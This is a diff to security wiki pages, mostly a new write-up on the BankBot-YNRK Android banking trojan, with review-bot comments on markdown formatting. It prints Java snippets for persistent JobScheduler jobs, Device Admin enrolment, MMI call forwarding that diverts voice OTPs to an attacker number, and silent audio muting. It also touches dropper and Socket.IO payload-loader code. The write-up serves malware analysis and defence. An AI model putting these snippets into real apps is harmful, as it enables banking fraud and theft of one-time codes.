diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
index 7ca3e849fb4..3856fd5e0d9 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md
@@ -63,6 +63,9 @@
## Useful Frida Snippet: Auto-Bypass Invitation Code
+
+Frida hook to bypass invitation code
+
```python
# frida -U -f com.badapp.android -l bypass.js --no-pause
# Hook HttpURLConnection write to always return success
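Review bot: the fence this hunk leads into is tagged ```python, but the script is Frida JavaScript (`# frida -U -f com.badapp.android -l bypass.js --no-pause`, `Java.perform(function() {`), and the two leading `#` comment lines are a syntax error in a .js file; retag the fence as ```javascript and turn those comments into `//` so the snippet actually loads with `-l bypass.js`. The added line `Frida hook to bypass invitation code` only restates the heading directly above it; either drop it or make it a proper sentence ending in a colon.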
@@ -82,6 +85,8 @@ Java.perform(function() {
});
```
+
+
## Indicators (Generic)
```
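Review bot: two consecutive blank lines are inserted before `## Indicators (Generic)`; a single blank line is enough, and the same double blank is added after the later fences in this file (before `Why it evades simple controls:` and `HTML on the page:`), so collapse all of them to one.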
@@ -145,7 +150,7 @@ Minimal loader:
```java
WebView wv = findViewById(R.id.web);
wv.getSettings().setJavaScriptEnabled(true);
-wv.loadUrl(upiPage); // ex: https:///gate.htm
+wv.loadUrl(upiPage); // ex: https://``/gate.htm
```
### Self-propagation and SMS/OTP interception
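Review bot: the replacement comment `// ex: https://``/gate.htm` puts a pair of markdown backticks inside a Java comment, which is not a recognisable placeholder; the original line `https:///gate.htm` already had the host elided, so the fix should make that explicit with something like `// ex: https://<host>/gate.htm` rather than leave markup residue in the code.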
@@ -228,9 +233,12 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann
Typical client flow observed in the wild:
+
+Socket.IO client flow assembling APK in the browser
+
```javascript
// Open Socket.IO channel and request payload
-const socket = io("wss:///ws", { transports: ["websocket"] });
+const socket = io("wss://``/ws", { transports: ["websocket"] });
socket.emit("startDownload", { app: "com.example.app" });
// Accumulate binary chunks and drive fake Play progress UI
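Review bot: `io("wss://``/ws", { transports: ["websocket"] })` now carries a backtick pair inside a JavaScript string literal, which still parses but is not a meaningful placeholder; use `wss://<host>/ws` so readers see where the host goes. The added line `Socket.IO client flow assembling APK in the browser` duplicates the existing `Typical client flow observed in the wild:` directly above it; merge the two into one lead-in.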
@@ -248,6 +256,8 @@ socket.on("downloadComplete", () => {
});
```
+
+
Why it evades simple controls:
- No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames.
- URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO.
@@ -265,6 +275,59 @@ See also WebSocket tradecraft and tooling:
{{#endref}}
+## Accessibility-driven banker TTPs: JobScheduler + Device Admin + MMI call forwarding (BankBot‑YNRK)
+
+The Android/BankBot‑YNRK banker shows a compact stack for durable control and on‑device fraud via Accessibility. Key reusable traits:
+
+- Bootstrap & scope
+ - Target Android ≤ 13 where Accessibility can still auto‑drive permission flows; deep‑link Accessibility Settings and auto‑accept prompts. See:
+
+{{#ref}}
+../../mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md
+{{#endref}}
+
+- Persistence via JobScheduler + Device Admin
+ - Schedule a persisted job (survives reboot) to regularly re‑kick background tasks:
+ ```java
+ ComponentName svc = new ComponentName(ctx, JobHandlerService.class);
+ JobInfo ji = new JobInfo.Builder(1337, svc)
+ .setRequiredNetworkType(JobInfo.NETWORK_TYPE_ANY)
+ .setPersisted(true)
+ .setMinimumLatency(30_000)
+ .setBackoffCriteria(30_000, JobInfo.BACKOFF_POLICY_LINEAR)
+ .build();
+ ctx.getSystemService(JobScheduler.class).schedule(ji);
+ ```
+ - Enrol as Device Admin to harden removal and regain control after reboot:
+ ```java
+ Intent i = new Intent(DevicePolicyManager.ACTION_ADD_DEVICE_ADMIN);
+ i.putExtra(DevicePolicyManager.EXTRA_DEVICE_ADMIN, new ComponentName(ctx, AdminReceiver.class));
+ i.putExtra(DevicePolicyManager.EXTRA_ADD_EXPLANATION, "Enable advanced protections");
+ ctx.startActivity(i);
+ ```
+
+- Silent OTP interception via call forwarding (MMI/USSD)
+ - Programmatically dial MMI to enable unconditional call forwarding, diverting voice OTPs to an attacker‑controlled number:
+ ```java
+ // Requires CALL_PHONE; behaviour varies by carrier/OEM
+ String mmi = "**21*" + number + "#";
+ Intent call = new Intent(Intent.ACTION_CALL, Uri.parse("tel:" + Uri.encode(mmi)));
+ ctx.startActivity(call);
+ ```
+
+- C2 & traffic
+ - Stage‑based HTTP tasking (e.g., on `:8181`) exchanging device/app context and target package lists; optional WebSocket/WebRTC (Janus on `:8989`) for interactive control.
+
+- Anti‑analysis & stealth
+ - Fingerprint vendor/ROM/emulator at init (`android.os.Build` fields, model→resolution maps) to gate execution.
+ - Suppress audible cues by muting multiple AudioManager streams when sensitive actions run:
+ ```java
+ AudioManager am = (AudioManager) ctx.getSystemService(Context.AUDIO_SERVICE);
+ int[] S = {AudioManager.STREAM_MUSIC, AudioManager.STREAM_RING, AudioManager.STREAM_NOTIFICATION};
+ for (int s: S) am.setStreamVolume(s, 0, 0);
+ ```
+
+
## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study
The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques.
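Review bot: the sub-bullets and fenced blocks under each top-level bullet are indented by a single space (` - Target Android ≤ 13 where Accessibility can still auto‑drive permission flows`, ` ```java`), which is not enough for CommonMark/mdBook to treat them as nested content, so the sub-items render as sibling bullets and the fences split the lists; indent nested content by at least two spaces (four for the fences is safest). The section also uses the non-breaking hyphen U+2011 in `BankBot‑YNRK`, `auto‑drive`, `deep‑link`, `on‑device` and `re‑kick`, which makes the text un-greppable for `BankBot-YNRK` and produces an odd heading anchor; replace them with ASCII hyphens. Next to the JobScheduler snippet, state that `.setPersisted(true)` requires the `RECEIVE_BOOT_COMPLETED` permission in the manifest, since a persisted job combined with that permission is a useful static indicator when triaging samples. The section ends with two blank lines; one is enough.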
@@ -274,6 +337,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript
Minimal pattern:
+
+WebView dropper that installs a second-stage payload from assets
+
```java
public class DropperActivity extends Activity {
@Override protected void onCreate(Bundle b){
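Review bot: the added line `WebView dropper that installs a second-stage payload from assets` sits directly under the existing `Minimal pattern:` and says the same thing in different words; fold it into one lead-in (for example `Minimal pattern, a WebView dropper that installs a second-stage payload from assets:`) instead of stacking two intros before the fence.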
@@ -303,6 +369,8 @@ public class DropperActivity extends Activity {
}
```
+
+
HTML on the page:
```html
@@ -440,5 +508,6 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new
- [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/)
- [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN)
- [Socket.IO](https://socket.io)
+- [Investigation Report: Android/BankBot‑YNRK Mobile Banking Trojan (CYFIRMA)](https://www.cyfirma.com/research/investigation-report-android-bankbot-ynrk-mobile-banking-trojan/)
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file
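Review bot: the `\ No newline at end of file` marker after the re-added `+{{#include ../../banners/hacktricks-training.md}}` shows the file still ends without a trailing newline, so the include line is removed and re-added only to be left unterminated; add the final newline so the banner include closes the file cleanly and the hunk reduces to the one-line reference addition. The new reference title also uses U+2011 in `BankBot‑YNRK`; use an ASCII hyphen so it is searchable and consistent with the rest of the reference list.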
diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
index b9d599deb30..6d338df2b68 100644
--- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md
+++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md
@@ -1,4 +1,6 @@
-## LESS Code Injection leading to SSRF & Local File Read
+# LESS Code Injection leading to SSRF & Local File Read
+
+{{#include ../../../banners/hacktricks-training.md}}
LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
@@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
-* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
\ No newline at end of file
+* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
+{{#include ../../../banners/hacktricks-training.md}}
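Review bot: the trailing `{{#include ../../../banners/hacktricks-training.md}}` is placed directly after the last reference bullet `* [CVE-2024-58258](...)` with no blank line between them, so whatever the include expands to is parsed as a lazy continuation of that list item; insert a blank line before the include. Re-adding the CVE line with a terminating newline (the old copy carried `\ No newline at end of file`) is correct and should stay.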